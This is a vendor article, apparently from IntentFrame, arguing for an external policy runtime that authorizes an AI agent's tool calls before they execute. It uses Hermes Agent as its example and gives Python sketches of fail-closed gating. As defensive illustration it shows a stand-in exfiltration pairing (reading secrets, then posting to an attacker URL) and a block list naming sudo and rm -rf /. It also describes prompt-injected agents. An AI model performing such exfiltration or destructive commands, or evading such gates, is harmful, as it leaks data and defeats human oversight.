
AI Agent Security Requires a Judge Outside the Agent

Prompt guardrails and in-process allowlists fail when the model is wrong or hijacked. AI agent security needs an external judge that authorizes actions before they run.


Most teams building with AI agents start in the same place: system prompts, tool allowlists, human-in-the-loop approval for dangerous commands. That works until it doesn't — and when it fails, it fails silently.

The model doesn't need to "break out" of anything. It just needs to be wrong, tricked, or over-eager while holding tools that can run shell commands, write files, or schedule cron jobs. At that moment, the question isn't whether your prompt was good. It's whether anything outside the agent can stop the action before it runs.

That's the core of AI agent security: not better instructions, but structural separation between proposal and execution.

The trust boundary problem

An agent "turns thought into effect" the moment it executes a tool. Every consequential tool call crosses a trust boundary:

User intent → Model reasoning → Tool call → Side effect on host/network/data

Most agent stacks treat security as a layer inside that pipeline:

  • Prompt rules ("never run sudo")
  • Config allowlists
  • Optional human approval UI
  • Container isolation

These controls share a fatal assumption: the agent process remains trustworthy. But the agent process is exactly what you're trying to constrain. It hosts the model, parses tool calls, and dispatches handlers. When the model is manipulated via prompt injection, confused by ambiguous instructions, or operating autonomously on a schedule, you're asking the same runtime that wanted the action to also veto it.

| Approach | Where rules live | Failure mode |
| Prompt-only | Model context | No enforcement at execution |
| In-process allowlists | Agent config | Same process can be bypassed or misconfigured |
| Human approval | Operator UI | Doesn't scale; often skipped under load |
| External policy runtime | Separate process | Agent proposes; judge authorizes independently |

AI agent security that holds up in production needs the last row: an external judge.

Structural separation: propose, judge, execute

IntentFrame implements this pattern as validate-only governance:

You → Agent proposes an action → External policy runtime checks your rules
                                      ├─ ALLOW → action runs
                                      └─ BLOCK → logged, never runs

Three properties matter:

  1. Outside the agent. Policy evaluation runs in a separate backend, not inside the agent's tool handler.
  2. Before execution. Validation happens on the proposed action payload — before shell commands run, before files are written.
  3. Fail closed. If validation fails, errors, times out, or returns an ambiguous result, the action does not proceed.
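
The three properties above can be sketched in a few lines of Python. This is a minimal illustration under stated assumptions, not IntentFrame's actual API: the names `Decision`, `judge`, and `run_if_allowed`, the `validate` callable (standing in for a call to a separate policy backend, typically with a timeout), and the `{"verdict": ...}` response shape are all hypothetical.

```python
from dataclasses import dataclass
from typing import Any, Callable, Optional, Tuple

ALLOW = "ALLOW"
BLOCK = "BLOCK"


@dataclass(frozen=True)
class Decision:
    verdict: str
    detail: str


def judge(action: dict, validate: Callable[[dict], Any]) -> Decision:
    """Ask the external validator about a proposed action; fail closed on any doubt."""
    try:
        # Hypothetical: in a real setup this would call a separate process.
        response = validate(action)
    except Exception as exc:  # timeout, connection error, malformed reply, ...
        return Decision(BLOCK, f"validator error: {exc!r}")
    verdict = response.get("verdict") if isinstance(response, dict) else None
    if verdict == ALLOW:
        return Decision(ALLOW, "allowed by policy")
    # Anything that is not an explicit ALLOW (BLOCK, missing field, typo) blocks.
    return Decision(BLOCK, f"not explicitly allowed: {verdict!r}")


def run_if_allowed(
    action: dict,
    validate: Callable[[dict], Any],
    execute: Callable[[dict], Any],
) -> Tuple[Decision, Optional[Any]]:
    """Validate before execution; the executor is never reached on BLOCK."""
    decision = judge(action, validate)
    if decision.verdict != ALLOW:
        return decision, None
    return decision, execute(action)
```

The design choice worth noting is that `ALLOW` is the only value that lets the action through. Errors, timeouts, and unexpected responses all collapse into `BLOCK`.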

This is the same architectural instinct behind OAuth, API gateways, and service meshes: authorization is not a feature of the caller; it's a gate the caller must pass through.


Why in-process guardrails aren't enough

Take Hermes Agent as a concrete example. Hermes ships serious safety features: command approval, allowlists, container isolation. Those run inside the Hermes stack.

IntentFrame doesn't replace Hermes. It adds an external checkpoint for the tools that can actually touch your machine:

|  | Hermes alone | Hermes + IntentFrame |
| Where rules live | Prompts, config, allowlists inside Hermes | Policy YAML outside the agent |
| Who validates risky tools | The Hermes runtime | IntentFrame, before the action runs |
| If the model is tricked | Same process that wanted to act | External judge blocks + audit trail |

The integration governs Hermes's highest-risk tools by default: terminal, execute_code, write_file, patch, and cronjob. Reads like read_file stay ungoverned in v1 — a deliberate tradeoff, with an important caveat below.

Two layers per governed tool

Gating only the executor isn't enough. A serious AI agent security gate touches two surfaces:

| Layer | What it is | What the gate does |
| Schema | Tool spec shown to the model | Requires a reason field so the model explains intent |
| Executor | Function that runs the tool | Calls external validator; runs original handler only on ALLOW |

Patching only the executor means the model never supplies structured intent. Patching only the schema means you ask for reasons but never enforce them. You need both, every time.

The Hermes integration implements this as a plugin that wraps governed tool handlers: validate via a local adapter → strip reason → delegate to the untouched original handler on ALLOW.
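
A rough sketch of the two layers, assuming a JSON-Schema-style tool spec and handlers that take a single dict of arguments. Neither assumption is confirmed by the Hermes or IntentFrame documentation, and `require_reason`, `govern`, and the boolean `validate` callable are hypothetical names used only for illustration.

```python
import copy
from typing import Any, Callable


def require_reason(schema: dict) -> dict:
    """Schema layer: return a copy of the tool spec with a required `reason` string."""
    patched = copy.deepcopy(schema)
    params = patched.setdefault("parameters", {"type": "object"})
    params.setdefault("properties", {})["reason"] = {
        "type": "string",
        "description": "Why this action is needed, in one sentence.",
    }
    required = params.setdefault("required", [])
    if "reason" not in required:
        required.append("reason")
    return patched


def govern(
    tool_name: str,
    handler: Callable[[dict], Any],
    validate: Callable[[dict], bool],
) -> Callable[[dict], Any]:
    """Executor layer: validate, strip `reason`, then delegate to the original handler."""

    def gated(args: dict) -> Any:
        blocked = {"status": "blocked", "tool": tool_name}
        if not args.get("reason"):
            return blocked  # the schema asked for a reason; enforce it here
        try:
            allowed = validate({"tool": tool_name, "args": args}) is True
        except Exception:
            allowed = False  # fail closed on validator errors
        if not allowed:
            return blocked
        # The original handler never sees the extra field.
        clean = {k: v for k, v in args.items() if k != "reason"}
        return handler(clean)

    return gated
```

Wrapping rather than rewriting the handler keeps the original tool behavior untouched on ALLOW, which matches the validate, strip, delegate order described above.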

Govern the privileged path, not everything

Blanket tool gating creates friction without proportional risk reduction. The right axis is:

"Changes state OR communicates externally."

| Govern | Leave in-process (usually) |
| Shell / code execution | Parsing, formatting, math |
| File writes, deletes | Internal read-only helpers |
| Cron / scheduled autonomy | Retrieval whose output stays in context |
| Outbound messaging, webhooks |  |

Watch the exfiltration pairing:

read_file("secrets")  →  http_post("https://attacker/?data=...")

Neither call is a "write," but together they leak. AI agent security must govern outbound channels even when they aren't local mutations.

Select by tool name, not toolset. Hermes's file toolset mixes read_file (read) and write_file (write). Toolset-level filters are too coarse.
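
As a small illustration of name-level selection: the governed set below uses the five default tool names listed earlier, while `http_post` (borrowed from the exfiltration example), the `TOOLSETS` layout, and the helper names are assumptions made for this sketch rather than real Hermes configuration.

```python
# Default governed tools named in this article.
GOVERNED_TOOLS = frozenset({"terminal", "execute_code", "write_file", "patch", "cronjob"})
# Hypothetical outbound tool, taken from the exfiltration example above.
OUTBOUND_TOOLS = frozenset({"http_post"})

# Hypothetical toolset layout: one toolset mixing a read and a write.
TOOLSETS = {"file": ["read_file", "write_file"]}


def is_governed(tool_name: str) -> bool:
    """Govern tools that change state or communicate externally."""
    return tool_name in GOVERNED_TOOLS or tool_name in OUTBOUND_TOOLS


def partition(toolset: str) -> dict:
    """Split one toolset into governed and in-process tools, by tool name."""
    tools = TOOLSETS[toolset]
    return {
        "governed": [t for t in tools if is_governed(t)],
        "in_process": [t for t in tools if not is_governed(t)],
    }
```

A toolset-level switch would have to treat `read_file` and `write_file` the same way. Selecting by name lets the write go through the gate while the read stays in-process.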

Deterministic + semantic enforcement

External authorization isn't one check. IntentFrame runs a pipeline:

  1. Deterministic constraints — path allowlists, blocked command patterns (sudo, rm -rf /), capability denylists
  2. Semantic review — Guardian evaluates whether the stated reason matches the actual operation, especially for ambiguous or high-impact actions

Deterministic rules catch obvious violations in milliseconds. Semantic review catches scope mismatches, such as a request to "add a comment" to .bashrc where the proposed patch would overwrite the whole shell config file.

Both layers produce audit logs independent of the agent's own logging.
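
The two-stage pipeline could look roughly like the sketch below. The patterns, the `/workspace` allowlist root, the action shape, and every function name are illustrative assumptions. The `semantic_review` callable is only a stand-in for a reviewer such as Guardian, whose real interface is not described here.

```python
import re
from pathlib import PurePosixPath
from typing import Callable, Optional, Tuple

# Deliberately simple patterns; real rules would need to handle flag variants.
BLOCKED_COMMAND_PATTERNS = [
    re.compile(r"\bsudo\b"),
    re.compile(r"\brm\s+-rf\s+/(\s|$)"),
]
# Hypothetical allowlist root for file writes.
ALLOWED_WRITE_ROOTS = [PurePosixPath("/workspace")]


def path_allowed(path: str) -> bool:
    """Allow only absolute paths under an allowlisted root, with no `..` parts."""
    p = PurePosixPath(path)
    if not p.is_absolute() or ".." in p.parts:
        return False
    return any(root == p or root in p.parents for root in ALLOWED_WRITE_ROOTS)


def deterministic_check(action: dict) -> Optional[str]:
    """Return a violation message, or None if no hard rule is broken."""
    tool, args = action.get("tool"), action.get("args", {})
    if tool == "terminal":
        command = args.get("command", "")
        for pattern in BLOCKED_COMMAND_PATTERNS:
            if pattern.search(command):
                return f"blocked command pattern: {pattern.pattern}"
    if tool in {"write_file", "patch"} and not path_allowed(args.get("path", "")):
        return "path outside allowlist"
    return None


def evaluate(action: dict, semantic_review: Callable[[dict], bool]) -> Tuple[str, str]:
    """Run cheap deterministic rules first, then the semantic reviewer."""
    violation = deterministic_check(action)
    if violation:
        return ("BLOCK", violation)
    if not semantic_review(action):
        return ("BLOCK", "stated reason does not match the operation")
    return ("ALLOW", "passed deterministic and semantic checks")
```

Ordering the stages this way means the slower semantic reviewer is only consulted for actions that have already cleared the hard limits.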


What this means for your stack

If you're evaluating AI agent security tooling, ask four questions:

  1. Does authorization run outside the agent process?
  2. Does it run before side effects, not after?
  3. Can policy change without redeploying the agent?
  4. Is there an audit trail an operator can trust more than the model's explanation?

Prompt engineering, RBAC on API keys, and sandboxing each solve adjacent problems. None replaces runtime authorization by an external judge.

IntentFrame's Hermes integration is the first shipped example of this pattern: a plugin gate, adapter sidecar, policy backend, and operator control plane — all outside Hermes's own process boundary.

Related: Deploy AI agent governance on Hermes · Runtime authorization incident teardown · Deployment options


Frequently asked questions

Why isn't prompt engineering enough for AI agent security?
Prompts only influence what the model tries to do. They do not enforce anything at execution time. A confused, jailbroken, or prompt-injected model can still call tools. Security requires a separate authorization step that runs before side effects occur.

What is structural separation in AI agent security?
Structural separation means the component that decides whether an action is allowed runs outside the agent process. The agent proposes actions; an external policy runtime judges them. If the model and the enforcement logic share the same process, a compromised agent can bypass its own guardrails.

What should AI agent security govern first?
Start with the privileged path: shell execution, file writes, code execution, scheduled autonomous work, and outbound channels. Low-risk reads can stay in-process, but ungoverned outbound tools paired with reads enable exfiltration.

Ready to put a boundary around your agent's actions?

See how IntentFrame checks every action against hard limits and plain-English policy before it runs. Related GitHub repos: IntentFrame core · Hermes agent integration